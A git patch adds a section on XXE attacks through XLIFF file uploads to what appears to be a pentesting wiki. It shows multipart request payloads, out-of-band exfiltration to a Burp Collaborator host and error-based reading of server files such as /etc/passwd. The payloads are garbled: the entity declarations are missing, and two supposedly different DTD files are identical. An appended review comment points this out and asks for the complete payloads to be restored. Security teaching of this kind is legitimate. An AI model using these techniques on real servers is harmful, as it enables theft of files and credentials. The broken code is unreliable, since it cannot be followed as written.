From 7a324143568045d6464e6dccba08563926c8018d Mon Sep 17 00:00:00 2001 From: CPol Date: Tue, 20 Jul 2021 10:48:25 +0000 Subject: [PATCH] GitBook: [master] one page modified --- pentesting-web/xxe-xee-xml-external-entity.md | 75 +++++++++++++++++++ 1 file changed, 75 insertions(+) diff --git a/pentesting-web/xxe-xee-xml-external-entity.md b/pentesting-web/xxe-xee-xml-external-entity.md index 37c5a3380..aded7f527 100644 --- a/pentesting-web/xxe-xee-xml-external-entity.md +++ b/pentesting-web/xxe-xee-xml-external-entity.md 
@@ -515,6 +515,81 @@ You can use the \[**"Encode Recipe**" of cyberchef here \]\([https://gchq.github %dtd;]>]]> ``` +## XLIFF - XXE + +This section was taken from [https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe](https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe) +According to the [Wikipedia](https://en.wikipedia.org/wiki/XLIFF): + +> XLIFF \(XML Localization Interchange File Format\) is an XML-based bitext format created to standardize the way localizable data are passed between and among tools during a localization process and a common format for CAT tool exchange. + +### Blind request + +```markup +------WebKitFormBoundaryqBdAsEtYaBjTArl3 +Content-Disposition: form-data; name="file"; filename="xxe.xliff" +Content-Type: application/x-xliff+xml + + + %remote; ]> + +------WebKitFormBoundaryqBdAsEtYaBjTArl3-- +``` + +The server response with an error: + +```javascript +{"status":500,"error":"Internal Server Error","message":"Error systemId: http://redacted.burpcollaborator.net/?xxe_test; The markup declarations contained or pointed to by the document type declaration must be well-formed."} +``` + +But we got a hit on Burp Collaborator. + +### Exfiltrating Data via Out of Band + +```markup +------WebKitFormBoundaryqBdAsEtYaBjTArl3 +Content-Disposition: form-data; name="file"; filename="xxe.xliff" +Content-Type: application/x-xliff+xml + + + %remote; ]> + +------WebKitFormBoundaryqBdAsEtYaBjTArl3-- +``` + +Based on the displayed User Agent returned by burp collaborator, it appears that it is using **Java 1.8**. One of the problems when exploiting XXE on this version of Java is **we’re unable to obtain the files containing a `New Line`** such as `/etc/passwd` using the Out of Band technique. 
+ +### Exfiltrating Data via Error Based + +DTD File: + +```markup + +"> +%foo; +%xxe; +``` + +Server Response: + +```javascript +{"status":500,"error":"Internal Server Error","message":"IO error.\nReason: /nofile (No such file or directory)"} +``` + +Great! The `non-exist` file is reflected in the Error messages. Next is adding the File Content. + +DTD File: + +```markup + +"> +%foo; +%xxe; +``` + +And the content of the file was successfully **printed in the output of the error sent via HTTP**. + ## RSS - XEE Valid XML with RSS format to exploit an XXE vulnerability.
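Review bot: the four fenced blocks in this hunk are missing the declarations that make them meaningful: both `xxe.xliff` request bodies show only the trailing `%remote; ]>` of the DOCTYPE, and both "DTD File" blocks show only `">`, `%foo;`, `%xxe;` with no `<!ENTITY ...>` lines, so as committed the "Blind request", "Out of Band" and "Error Based" sections cannot be followed and the two DTD blocks are byte-for-byte identical even though the text says the second one "adds the File Content". Please restore the complete DOCTYPE/entity declarations from the cited pwn.vg article (the section states it was taken from there) so the reader can see the difference between the `/nofile` probe and the variant that reflects the file contents. Minor points: the multipart bodies are tagged `markup` and the JSON error responses `javascript`; `http` and `json` would render correctly. "The server response with an error" should read "The server responds with an error", and the Java 1.8 paragraph would benefit from one sentence saying that the error-based section that follows is the workaround for the newline limitation, since that is the reason the sections are ordered this way.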